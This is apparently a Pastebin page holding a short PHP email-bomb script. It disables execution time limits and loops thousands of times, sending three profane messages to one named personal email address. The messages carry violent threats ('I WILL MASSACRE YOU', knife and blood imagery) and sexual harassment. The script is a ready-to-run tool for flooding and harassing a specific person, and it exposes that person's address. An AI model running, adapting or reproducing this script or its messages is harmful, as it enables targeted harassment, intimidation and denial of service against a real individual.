Advertisement
Guest User

Untitled

a guest
May 9th, 2017
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.10 KB | None | 0 0
  1. <?
  2.  
  3. set_time_limit(0);
  4. @ini_set('max_execution_time', 0);
  5.  
  6. ignore_user_abort();
  7.  
  8.  
  9. /* Subject here */
  10. $subject1 = "YOUR A DOUCHE";
  11. $subject2 = "FUCK. YOU.";
  12. $subject3 = "CUSS YO ASSES UP";
  13.  
  14. # Email message #1 to send, "\n" is a newline
  15. $msg1 = "Oh, okay, Shitbags. Take a step back and literally FUCK YOUR OWN FACES.
  16.  
  17. I dont know what kinda pan pacific bullshit powerplay you're trying to do but the Internet is my property. So whatever you think you better rethink because else I will have to
  18.  
  19. head down there and I will rain down a godly fucking firestorm upon you. You gonna have to call the fucking United Nations to get a fucking binding resolution to keep me from
  20.  
  21. fucking destroying you.
  22.  
  23. I am talking SCORCHED EARTH MOTHERFUCKER. I WILL MASSACRE YOU. I WILL FUCK YOU UP.";
  24.  
  25.  
  26. # Email message #2 to send, "\n" is a newline
  27.  
  28. $msg2 = "I have motor Tourette's. So I twitch, a lot. It blows. I'm 20, I live at home. I can't live alone because I can't afford my FUCKING pills. SO LET'S FUCKING FUCK THIS
  29.  
  30. MOTHERFUCKING PILE OF HOT STEAMING CUNT SHIT RIGHT UP HIS ASS LIKE A GOD DAMN UNION PACIFIC FREIGHT TRAIN AND LET'S MAKE HIM REGRET FUCKING WITH THE WORD "FUCK!"
  31.  
  32. BITCH TITS.";
  33.  
  34. # Email message #3 to send, "\n" is a newline
  35.  
  36. $msg3 = "HI YOU ARE SEXY. CAN I FUCK YOUR ASSHOLE IF YOU SHUT THE FUCK UP?! Sometimes \"cursing\" (you cunt) is actually fucking powerful. Have you ever had a knife pulled on
  37.  
  38. you? You middle class spoiled piece of rotten shit. You're a lot less likely to just get killed in spite for saying, \"OH BARNACLES! HALP! TAKE MY DARN MONEY MISTER!\" Yeah say
  39.  
  40. that and watch the blood pour from your fucking new-found neck-cunt. Pussy. You haven't felt manly pain, therefore don't have the urge to loudly proclaim FUCKING SHIT FUCK CUNT
  41.  
  42. PISS to the whole fucking neighborhood.
  43.  
  44. Here's a tip: Get a life. Get laid. Cunt.";
  45.  
  46. for ($i = 0;$i <= 9001; $i++) {
  47.     mail("brhatch@earthlink.net", $subject1, $msg1, $header);
  48.     mail("brhatch@earthlink.net", $subject2, $msg2, $header);
  49.     mail("brhatch@earthlink.net", $subject3, $msg3, $header);
  50.     $i++;
  51. }
  52.  
  53. # Coded by h00ni3z.
  54.  
  55. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement